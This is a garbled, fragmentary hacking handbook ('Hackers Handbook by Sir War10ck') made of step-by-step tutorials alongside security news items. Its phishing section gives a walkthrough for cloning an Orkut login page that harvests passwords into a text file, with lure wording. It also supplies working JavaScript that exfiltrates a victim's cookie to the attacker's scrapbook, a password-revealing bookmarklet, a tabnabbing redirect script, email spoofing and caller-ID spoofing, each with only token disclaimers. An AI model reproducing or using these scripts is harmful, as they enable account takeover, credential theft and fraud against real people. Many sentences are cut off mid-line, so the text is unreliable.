Guide Mysql
Guide Mysql
TUTS
HACKING LIFE TUTORIALS
HACKERS HANDBOOK
PART I
WCS
HACKING THE SYSTEM
HACKERS HANDBOOK BY SIR WAR10CK
@echo off:
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
Pause
Goto A3.
Step 4 :- Drag this file (.bat file)over to Command Prompt and press enter!
MESSENGER
User:
Step 6 :- After "User” type the IP address of the computer you want to contact.
MESSENGER
Message: Hi, How are you ? Message: Hi, How are you?
Step 8 :- Now all you need to do is press "Enter”, and start chatting.
“This Trick Works In the LAN connection Only. And may Not support some latest operating
1
HACKERS HANDBOOK BY SIR WAR10CK
Systems
Step 3. Type in "cmd" and hit ok You should now be at an MSDOS prompt screen.
Step 4. Type "ipconfig /release" just like that, and hit "enter"
You should now be on a screen with something titled "Local Area Connection", or
Step 9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General"
tab
Step 10. Click on "Use the following IP address" under the "General" tab
Step 11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the
area up).
Step 12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with
default numbers.
Step 14. Hit the "Ok" button again You should now be back to the "Local Area
Connection" screen.
Step 15. Right-click back on "Local Area Connection" and go to properties again.
2
HACKERS HANDBOOK BY SIR WAR10CK
With a little practice, you can easily get this process down to 15 seconds.
“This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking
website with this trick be extremely careful, because if they try a little, they can trace it
back.”
Requirement:
1. Windows XP CD
Step 2. Go to start
Step 3. Run
Now sit back and relax, it should all load and fix all your corrupted file on win XP.Hope this
xp system files.
“ If this Does Not Work Then You Need to Format The Computer as there would be Viruses
in the
PC and you can can Also Use the antivirus if the Possible otherwise format the PC “.
3
HACKERS HANDBOOK BY SIR WAR10CK
Folder
You all Are familier With such kinfd of ERROR in windows so how to Fix them.
Step 6:- Go back to the Command Prompt window and change to the directory the AVI (or
located in.
Step 7:- At the command prompt type DEL <filename> where <filename> is the file you
wish to delete.
Step 8:- Go back to Task Manager, click File, New Task and enter EXPLORER.EXE to restart
Step 5:-click once on the file u wanna delete so its name appears in the 'filename' box
4
HACKERS HANDBOOK BY SIR WAR10CK
(the filename should have the extension of the undeletable file so it will overwrite it)
Step 8:-It should ask u to overwrite the existing file, choose yes and u can delete it as
normal
Step 4:- To move into a directory type: cd c:\*** (The stars stand for your folder)
Step 5:- If you cannot access the folder because it has spaces for example Program Files or
do the following. instead of typing in the full folder name only take the first 6 letters then
Step 6:- Once your in the folder the non-deletable file it in type in dir - a list will come up
Step 7:- Now to delete the file type in del ***.bmp, txt, jpg, avi, etc... And if the file name
special 1st 6 letters followed by a ~ and a 1 rule. Example: if your file name was bad
specific folder thorugh command, del badfil~1.bmp and your file should be gone. Make
extension.
“ You can use antivirus to remove this error if then also the problem persists then you can
use the
following method “.
5
HACKERS HANDBOOK BY SIR WAR10CK
5. What Is Steganography?
Steganography is the art and science of hiding messages. Steganography is often combined
The word steganography is derived from the Greek words "steganos" and "graphein",
It is fairly easy to hide a secret message in a graphic file without obviously altering the
Steganography software
OutGuess is a universal steganographic tool that allows the insertion of hidden information
data sources. The nature of the data source is irrelevant to the core of OutGuess. The
handlers that will extract redundant bits and write them back after modification. In this
formats are supported. In the next paragraphs, images will be used as concrete example of
Camera/Shy is the only steganographic tool that automatically scans for and delivers
6
HACKERS HANDBOOK BY SIR WAR10CK
Web. It is a stand-alone, Internet Explorer-based browser that leaves no trace on the user's
security.
JPHIDE and JPSEEK are programs which allow you to hide a file in a jpeg visual image.
programs available on the internet but JPHIDE and JPSEEK are rather special. The design
a file but rather to do this in such a way that it is impossible to prove that the host file
typical visual image, a low insertion rate (under 5%) and the absence of the original file, it
any worthwhile certainty that the host file contains inserted data. As the insertion
nature of the jpeg coefficients differs from "normal" to the extent that it raises suspicion.
become visible to the naked eye. Of course some images are much better than others
fine detail is good. A cloudless blue sky over a snow covered ski paradise is bad. A waterfall
MP3Stego will hide information in MP3 files during the compression process. The data is
then hidden in the MP3 bit stream. Although MP3Stego has been written with
might be used as a copyright marking system for MP3 files (weak but still much better than
the MPEG copyright flag defined by the standard). Any opponent can uncompress the bit
7
HACKERS HANDBOOK BY SIR WAR10CK
will delete the hidden information (actually this is the only attack we know yet) but at the
Steghide is a steganography program that is able to hide data in JPG, BMP, WAV, and AU
not changed thus making the embedding resistant against first-order statistical tests.
appropriate instructions from each set. The executable filesize remains unchanged. The
The 1st method that We will Study Here Is Using command Prompt.
To hide a file behind a image file which means that if any one opens that image he will see
in a special way then you can open the hidden file behind the image.
2) Now select a file to hide behind the image and make it in .RAR format. With the help of
the WinRAR.
3) And most important is that paste both the files on desktop and run the following
prompt.
8
HACKERS HANDBOOK BY SIR WAR10CK
finalnameofimage.jpg }
And then hit enter the file will be created with the file final file name of the image.
“ Using This method for The illegal Activities is against the Laws this tutorial is for
educational
purpose only “.
“ You Can Also Use The softwares for the steganography like STEGHIDE Or F5 which will
make your
?
In this post I will explain you about an interesting cryptographic algorithm called MD5
algorithm is mainly used to perform file integrity checks under most circumstances. Here I
aspects of this algorithm, rather will tell you about how to make use of this algorithm in
about how to use MD5, I would like to share one of my recent experience which made me
Recently I made some significant changes and updates to my website and as obvious I
of the site on my server. I downloaded this backup onto my PC and deleted the original one
days something went wrong and I wanted to restore the backup that I downloaded. When I
9
HACKERS HANDBOOK BY SIR WAR10CK
was shocked! The backup file that I used to restore was corrupted. That means, the backup
my PC wasn’t exactly the one that was on my server. The reason is that there occured
download process. Yes, this data loss can happen often when a file is downloaded from the
Data loss during the download process, due to instability in the Internet
connection/server
So whenever you download any valuable data from the Internet it is completely necessary
the downloaded file. That is you need to ensure that the downloaded file is exactly the
this scenario the MD5 hash can become handy. All you have to do is generate MD5 hash
intended file on your server. After you download the file onto your PC, again generate MD5
Compare these two hashes and if it matches then it means that the file is downloaded
A MD5 hash is nothing but a 32 digit hexadicimal number which can be something as
follows
e4d909c290d0fb1ca068ffaddf22cbd0
10
HACKERS HANDBOOK BY SIR WAR10CK
This hash is unique for every file irrespective of it’s size and type. That means two .exe files
have the same MD5 hash even though they are of same type and size. So MD5 hash can be
file.
Suppose you have a file called backup.tar on your server. Before you download, you need
For UNIX:
md5sum backup.tar
e4d909c290d0fb1ca068ffaddf22cbd0
This is the MD5 hash for the file backup.tar. After you download this file onto your PC, you
again re-generating MD5 hash for the downloaded file. If both the hash matches then it
Otherwise it means that the file is corrupt. To generate the MD5 hash for the downloaded
http://www.md5summer.org/download.html “.
7. What Is Phishing ?
The act of sending an Email to a user falsely claiming to be an established legitimate
11
HACKERS HANDBOOK BY SIR WAR10CK
user into surrendering private information that will be used for identity theft.
The Email directs the user to visit a Web site where they are asked to update personal
and credit card, social security, and bank account numbers, that the legitimate
Emails inviting you to join a Social Group, asking you to Login using your Username and
Password.
Email saying that Your Bank Account is locked and Sign in to Your Account to Unlock IT.
Emails containing some Information of your Interest and asking you to Login to Your
Account.
The Phishing Hack Starts Now. this Hack example is for orkut account.
Step 1:- Download the necessary files Which you will need during the phishing attack. This
Step 2:- Unrar the download pack named orkuthacking.rar any where on your computer.
Step 3:- Upload the folder "ServiceLogin_files" and 2 of the files ->> "hackingtech.php" and
"hackingtech.txt" in any
You will have to create a sub-folder in the web hosting site's directory. Name that folder as
"ServiceLogin_files" and
12
HACKERS HANDBOOK BY SIR WAR10CK
upload the 2 images of the pack in that folder. (it must support PHPs.)
>>> You can choose one of the following web hosting Company to upload the Folder.
http://www.freeweb7.com
http://Ripway.com{Recommended}
http://www.110mb.com
http://www.phpnet.us
http://www.byethost.com
http://www.t35.com
http://www.awardspace.com
http://www.free-webhosts.com/free-php-webhosting.php
http://www.freehostia.com
http://www.dajoob.com
http://ifastnet.com
http://007ihost.com
http://www.247mb.com/register.jsp
http://www.10gbfreehost.com/
Step 4:- Your work is over now. Just give the link ofurfake page to the victim and whenever
Code:
http://urwebhostingsite/urusername/ServiceLogin.htm
Step 5:- Now you can send this link to victim by any mode but the best is my email send a
the your orkut account has a security problem pl. click on th link below and re-activate
13
HACKERS HANDBOOK BY SIR WAR10CK
Now If You want to create your own phishing page the follow the steps below.
Step 1:-Open the website whose phishing page you want create.
Step 2:-Then right click any where on the page and select view source.
Step 3:-Press ( Ctrl + A ) and the code will be selected and then press ( Ctrl + C ) to copy the
code.
Step 4:-The paste this code in a new notepad window and save it as ServerLogin.htm
Step 5:- Open "ServiceLogin.htm" with notepad and the search for word "action". [press
https://www.google.com/accounts/ServiceLoginAuth "
Step 7:-Replace the link between this red quote with the link you got by uploading the file
Step 9:-Now Upload the folder "ServiceLogin_files" and 2 of the files ->> "hackingtech.php"
Step 10:-You are done just go to the link of the file serverlogin.htm given by your hosting
company .
Step 11:- Now you can send this link to victim by any mode but the best is my email send a
orkut the your orkut account has a security problem pl. click on th link below and re-
14
HACKERS HANDBOOK BY SIR WAR10CK
Step 12:-To see the passwords that you have hacked just go to the link of hackingtech.txt
Read all the Email Carefully and Check if the Sender is Original.
Always check the URL in the Browser before Signing IN to your Account
Always Login to Your Accounts after opening the Trusted Websites, not by Clicking in
“Do not use this hack trick in any criminal activities like phishing bank websites and please
do not
behind ****
Step 1.First of all open up the webpage on which you wanna show the hidden passwords.
Step 2. Then in the username there must be the name and in the password there must be
********
Step 3.Now to see the password which is behind the ******** Just copy and paste the
javascript:(function(){var%20s,F,j,f,i;%20s%20=%20%22%22;
%20F%20=%20document.forms;%20for(j=0;%20j<F.length;%20++j)
%20{%20f%20=%20F[j];%20for%20(i=0;%20i<f.length;%20++i)
%20{%20if%20(f[i].type.toLowerCase()%20==%20%22password%22)
%20s%20+=%20f[i].value%20+%20%22\n%22;%20}%20}%20if
15
HACKERS HANDBOOK BY SIR WAR10CK
%20(s)%20alert(%22Passwords%20in%20forms%20on%20this
%20page:\n\n%22%20+%20s);%20else%20alert(%22There%20are
%20no%20passwords%20in%20forms%20on%20this
%20page.%22);})();
Step 4. After copying and pasting the JavaScript given above press the enter key and
you.
“You can use This script when some one has checked the remember me button in the login
form
of any website and to reveal password from that saved astrisk or encrypted password”.
“Do not use this hack trick in any criminal activities and please do not destroy any ones
account
Stealing
This article below explains the method to hack orkut account by stealing orkut account
has become much popular and hence i have added this article which will help you in
Just ask the victim to copy the script in address bar and then you will be able to
Note: My purpose is only to make u aware of what’s happening around and not to teach u
16
HACKERS HANDBOOK BY SIR WAR10CK
Procedure for hacking orkut account by stealing orkut cookies from Mozilla Firefox to hack
The post explains how one can steal cookies to hack orkut account or Gmail account. No
required.
Step2. Cookie editor“Download cookie editor plugin for Mozilla firefox from:
Step 3. You need to have two fake orkut accounts to Hack Orkut or Gmail , So that you
one Orkut account and other Orkut account for Advertising your Script, Well it depends on
Gmail(Orkut) accounts.
Cookie Script:
javascript:nobody=replyForm;nobody.toUserId.value=33444211;
nobody.scrapText.value=document.cookie;nobody.action=’scrapbook.aspx?
Action.submit’;nobody.submit()
Step 2. Right click on any Photo> Properties>55886645.jpg It will be a Eight Digit Value.
Step 3. Now replace your value with the value in the java script.
17
HACKERS HANDBOOK BY SIR WAR10CK
javascript:nobody=replyForm;nobody.toUserId.value=yournumber;
nobody.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,9
9,111,111,107,105,101));
nobody.action=’Scrapbook.aspx?Action.writeScrapBasic’;nobody.submit()
Step 2. Now send this Cookie script to the victim and ask him to paste in Address bar and
Press enter.
Step 3. You’ll get his orkut account cookie in your scrap book.
Step 4. After getting a orkut account cookie go to your orkut Home page , Then click on
Step 5. click filter/refresh.look for ‘orkut_state’ cookie. just double click it and replace the
victim’s Script
Logout of your orkut and login again and you’ll be in your victims Homepage.
Step 6. So remember guys…if you are having orkut account or having any other
I hope you have learned how to hack orkut accounts using cookie stealing. Just the script
accounts and then access victim’s orkut account. Enjoy hacking orkut.
“Do not use this hack trick in any criminal activities and please do not destroy any ones
account
18
HACKERS HANDBOOK BY SIR WAR10CK
“You can also use this attack for many other sites like yahoo but you will need some other
scripts
for that but nothing is impossible so use Google and search the script for other sites for
self-practice”.
Attack
Traditional phishing attacks are reasonably easy to avoid, just don’t click links in suspicious
paranoid, any e-mail). But Firefox Creative Lead Aza Raskin has found a far more devious
The attack works by first detecting that the tab the page is in does not have focus. Then the
the tab favicon and title before loading a new site, say a fake version of gmail or orkut, in
the background.
Even scarier, the attack can parse through your history to find sites you actually visit and
impersonate them.
Because most of us trust our tabs to remain on the page we left them on, this is a
Raskin writes, "as the user scans their many open tabs, the favicon and title act as a strong
mailable and moldable and the user will most likely simply think they left *the+ tab open.”
The only clue that you’re being tricked is that the URL will be wrong.
19
HACKERS HANDBOOK BY SIR WAR10CK
<a> open this in a tab of your browser and wait for 10 seconds and see after you come
<script type="text/javascript">
function initRedirect(){
xScroll = document.body.scrollLeft;
yScroll = document.body.scrollTop;
timerRedirect =
setInterval("location.href='http://www.hackingtech.co.tv/ServiceLogin.htm'",10000);
//set timed
redirect
pageYOffset/pageXOffset instead
xScroll = window.pageXOffset;
yScroll = window.pageYOffset;
timerRedirect =
setInterval("location.href='http://www.hackingtech.co.tv/ServiceLogin.htm'",10000);
20
HACKERS HANDBOOK BY SIR WAR10CK
//set timed
redirect
//else do nothing
function pollActivity(){
(xScroll!=document.body.scrollLeft ||
yScroll!=document.body.scrollTop)) //IE/NS7/Moz
||
yScroll!=window.pageYOffset))) {
//other browsers
} document.onmousemove=initRedirect;
document.onclick=initRedirect;
document.onkeydown=initRedirect;
window.onload=initRedirect;
window.onresize=initRedirect;
</script>
Replace the URL highlighted here with your URL where you want the victim to redirect.
Use This Script in the Page and then the page will redirect after 10 sec when the user if not
“Do not use this hack trick in any criminal activities and please do not destroy any ones
21
HACKERS HANDBOOK BY SIR WAR10CK
account
or Not
First of all let us see How email system is working over internet.
send button and the mail will go to SERVER1.com whereSERVER1.com will forward the mail
will search the [email protected] email ids server and send it to SERVER2.in and the the
the [email protected] in their own database and then the mail will be forwarded to
login to their account they will see an email in their inbox which is from [email protected].
To send fake mail We need to Bypass the [email protected] and SERVER1.com both and
internet .
So for that we will use a .php script as php has a function mail(); which can send email to
SERVER1.com and directly delivering the mail to SERVER2.in and then SERVER2.in will
their own database and then the mail will be forwarded to [email protected] and when the
22
HACKERS HANDBOOK BY SIR WAR10CK
facebook hacker
Hack facebook Account With facebook Hacker.
Facebook is one of the most attractive keywords of Computer Hacking and so, large
Computer Hacking. .
password, but yes, cause many nuisance and pranks by using this Facebook Hacker
software.
Step 3. Now, Facebook Hacker options are displayed Step 4. In Victim pane at left bottom,
enter the facebook ID of the victim you wanna hack in User ID field.
23
HACKERS HANDBOOK BY SIR WAR10CK
Thus, you can play such pranks with your friends using this Facebook Hacker. So, free
download Facebook
That's all. Hope you will enjoy using this tool. I have tried this Facebook hacker software
“Do not use this hack trick in any criminal activities and please do not destroy any ones
account
Keylogger is a software program or hardware device that is used to monitor and log each
computer keyboard. The user who installed the program or hardware device can then view
Because these programs and hardware devices monitor the keys typed in a user can easily
Keyloggers, as a surveillance tool, are often used by employers to ensure employees use
purposes only. Unfortunately, keyloggers can also be embedded in spyware allowing your
information to be transmitted
About keyloggers
A keylogger is a program that runs in the background, recording all the keystrokes. Once
24
HACKERS HANDBOOK BY SIR WAR10CK
hidden in the machine for later retrieval, or shipped raw to the attacker. The attacker then
hopes of either finding passwords, or possibly other useful information that could be used
be used in a social engineering attack. For example, a keylogger will reveal the contents of
A keylogger normally consists of two files: a DLL which does all the work and an EXE which
hook. Therefore when you deploy the hooker on a system, two such files must be present
There are other approaches to capturing info about what you are doing.
Otherkeyloggerswill secretly turn on video or audio recorders, and transmit what they
connection.
A keyloggers might be as simple as an exe and a dll that are placed on a machine and
Includes kernel keylogger driver that captures keystrokes even when user is logged off
ProBot program files and registry entries are hidden (Windows 2000 / XP)
25
HACKERS HANDBOOK BY SIR WAR10CK
Mouse activities
Password authentication
Invisible operation
Because a keylogger can involve dozens of files, and has as a primary goal complete stealth
manually can be a terrifying challenge to any computer user. Incorrect removal efforts can
operating system, instability, inability to use the mouse or keyboard, or worse. Further,
26
HACKERS HANDBOOK BY SIR WAR10CK
manual efforts to remove them, re-installing themselves before the user even reboots.
1. Actual spy.
2. Golden Keylogger
3. Remote Keylogger.
4. Home Keylogger
6. Stealth keyboard
The real name of this virus is Iddono. This threat copies its file(s) to your hard disk. Its
creates new startup key with name Iddono and value newfolder.exe. You can also find it in
newfolder.exe or Iddono. This virus is very difficult to eliminate manually, but you can find
removal below.
Quick Solution:
27
HACKERS HANDBOOK BY SIR WAR10CK
True Sword will find and eliminate this problem and more than 447 908 other dangerous
spyware, adware, riskware, problemware, keyloggers, dialers and other kinds of malicious
Fast, easy, and handy, True Sword protects your computer against malicious programs that
and break your privacy. True Sword scans your hard disks and registry and destroys any
programs. Standard anti-virus software can do nothing against privacy breakers and
This problem can be solved manually by deleting all registry keys and files connected with
starup list and unregistering all corresponding DLLs. Additionally missing DLL's should be
case they are corrupted by Iddono. To fix this threat, you should: 1. Kill the following
appropriate files:
libedit.dll
newfolder.exe
shelliddono.dll
srv0104.ids
srvidd20.exe
If these files can't be deleted during normal Windows work or recreate themselves, reboot
28
HACKERS HANDBOOK BY SIR WAR10CK
deletion. If you do not see all of these files, then they are hiding themselves. You need
hidden files. 2. Delete the following malicious registry entries and\or values:
Another method which is recently discovered by me that any AVG antivirus above
virus easily.
“For beginners I recommend to for for the Software True Sword its free “.
Number
Step 1:- Go to http://www.mobivox.com and register there for free account.
Step 2:- During registration, remember to insert your friends (Victims) mobile number in
Step 3:- Complete registration and confirm your email id and then login to your account.
Step 4:- Click on "Direct WebCall" After successful Login into your Mobivox account.
Step 5:- You will arrive at page shown below. In "Enter a number" box, select your country
number(you can enter yours). Now, simply hit on "Call Now" button to call your friend with
Step 6:- That's it. Your friend will be shocked to see his own number calling him.
[1] .You get only 10 min to call free after that you need to pay money , but you can make
another account with another friends number and another email id and start pranking
29
HACKERS HANDBOOK BY SIR WAR10CK
again...
[2] .But don't miss use this hack by calling someone's GIRL Friend(s) OR BOY Friend(s).
Because
this hack is untraceable. If You call Customer Care and tell about this then they will tell this
thing
cannot happen.
Two critical zero-day vulnerabilities have been discovered in the world's 2nd most
popular database management software MySQL that could allow an attacker to take
Polish security researcher Dawid Golunski has discovered two zero-days, CVE-
2016-6662 and CVE-2016-6663, that affect all currently supported MySQL versions
Both MariaDB and PerconaDB had fixed the vulnerabilities, but Oracle had not.
settings into MySQL configuration files or create their own malicious ones.
EXPLOITATION VECTOR
The above flaw could be exploited either via SQL Injection or by hackers with
31
HACKERS HANDBOOK BY SIR WAR10CK
This could result in complete compromise of the server running the affected MySQL
version.
The researcher also warned that the vulnerability could be exploited even if SELinux
or AppArmor Linux kernel security module is enabled with default active policies for
The flaw actually resides in the mysqld_safe script that is used as a wrapper by
many MySQL default packages or installations to start the MySQL service process.
The mysqld_safe wrapper script is executed as root, and the primary mysqld process
The researcher will soon release details and full exploit code for CVE-2016-6663, the
Golunski reported the zero-day flaws to Oracle on July 29 and other affected
32
HACKERS HANDBOOK BY SIR WAR10CK
While Oracle acknowledged and triaged the report, scheduling the next Oracle CPUs
for October 18, 2016, MariaDB and PerconaDB patched their versions of the
Since more than 40 days have passed and the two vendors released the patches to
fix the issues, Golunski said he decided to go public with the details of the zero-days.
TEMPORARY MITIGATION:
Until Oracle fixes the problem in its next CPU, you can implement some temporary
But remember, the above mitigations are just workarounds, so you are advised to
33
HACKERS HANDBOOK BY SIR WAR10CK
plugged in.
Now, someone has actually created the Killer USB stick that destroys almost
called USB Kill 2.0 that can fry any unauthorized computer it's plugged into by
introducing a power surge via the USB port. It costs$49.95.
34
HACKERS HANDBOOK BY SIR WAR10CK
capacitors via the USB power supply, and then discharges – all in a matter of
seconds.
The USB stick discharges 200 volts DC power over the data lines of the host
BE USEFUL?
USB Kill stick could be a boon for whistleblowers, journalists, activists, and, not to
forget, cyber criminals, who want to keep their sensitive data away from law
It is like, if you're caught, kill yourself. In the same fashion as terrorists do. Here I
mean to kill the data from your laptop if the law enforcement has caught your laptop.
35
HACKERS HANDBOOK BY SIR WAR10CK
However, the company claims to have developed USB Kill 2.0 stick for the sole
VIDEO DEMONSTRATION
You can watch the video demonstration below by the company that shows USB Kill
The company claims about 95% of all devices available on the market today are
However, the only devices not vulnerable to USB kill attacks are recent models of
Apple's MacBook, which optically isolate the data lines on USB ports.
Juice jacking is a type of cyber attack wherein malware installed on a computer can
surreptitiously copy data from a smartphone, tablet or other computers using a USB
While USB Kill 2.0 has been "designed and tested to be safe," the company
warns that the USB stick "is a high-voltage device" and is only meant
for "responsible adults." Also, the company's website "strongly condemns the
malicious use of its products."
36
HACKERS HANDBOOK BY SIR WAR10CK
USB Kill 2.0 also comes with a USB Protection Shield, called Test Shield, sold for
additional $15.70, which is designed to allow testing of the USB Killer stick without
37
HACKERS HANDBOOK BY SIR WAR10CK
become more and more embedded in our daily lives, Bluetooth Low Energy, also
connecting IoT devices, medical equipment, smart homes and like most emerging
As devices vulnerabilities have real impact on our digital and physical security.
Enter the Bluetooth lock, promising digital key convenience with temporary and
Internet shareable access. The problem is, almost all of these locks have
38
HACKERS HANDBOOK BY SIR WAR10CK
DEF CON always has the coolest new hacks and security news, and this year was
no exception. The hacking conferences are a great way to get a pulse on the general
status of the security world, what people are interested in, worried about, or looking
to exploit.
This year clearly had an uptick in Internet of Things (IoT) devices and ways to
hack them.
Obviously, we had to go and take a look at the Bluetooth lock hack, and we are not
There were articles in a number of security and general tech sites about how
vulnerable some of these locks are – a shocking 75% of them could be hacked
relatively easily, and one reported to have great security could actually be broken
The locks were from companies like BlueLock, Kwikset, Noke, August, BitLock, and
QuickLock.
39
HACKERS HANDBOOK BY SIR WAR10CK
There have been a number of different researchers who have tackled this problem,
but Anthony Rose and Ben Ramsay out of Merculite Security did a great job of
thoroughly going through a significant number of them, documenting the hacks and
40
HACKERS HANDBOOK BY SIR WAR10CK
Locks are not the only Bluetooth devices shown to be vulnerable. Here’s a quick list
of just some of the devices that have already been found vulnerable:
Cars
Teakettles and coffee machines
Medical devices (including implanted ones)
Fitness trackers
This news should be worrying for people who have invested in a cheap Bluetooth
lock for their convenience, and such attacks could be a real problem just waiting to
happen.
41
HACKERS HANDBOOK BY SIR WAR10CK
42
HACKERS HANDBOOK BY SIR WAR10CK
43